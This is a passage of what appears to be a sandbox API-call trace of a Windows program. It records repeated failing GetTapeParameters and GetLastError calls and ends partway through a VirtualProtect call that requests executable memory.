dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.504] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.505] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.506] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.507] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.508] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.509] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.510] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.510] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.510] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.510] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.510] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.511] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.511] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.511] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.512] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.512] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.512] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.512] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.512] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.512] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.512] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.513] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.513] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.513] GetTapeParameters (in: hDevice=0x0, dwOperation=0x0, lpdwSize=0x18f6f0, lpTapeInformation=0x0 | out: lpdwSize=0x18f6f0, lpTapeInformation=0x0) returned 0x6 [0131.896] lstrlenA (lpString="") returned 0 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.896] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.897] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.898] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.899] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.900] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.901] GetLastError () returned 0x6 [0131.902] GetLastError () returned 0x6 [0131.902] GetLastError () returned 0x6 [0131.902] GetLastError () returned 0x6 [0131.902] GetLastError () returned 0x6 [0131.902] GetLastError () returned 0x6 [0132.152] VirtualProtect (in: lpAddress=0x30f370, dwSize=0x56475, flNewProtect=0x40, lpflOldProtect=0x18ee3c | out: 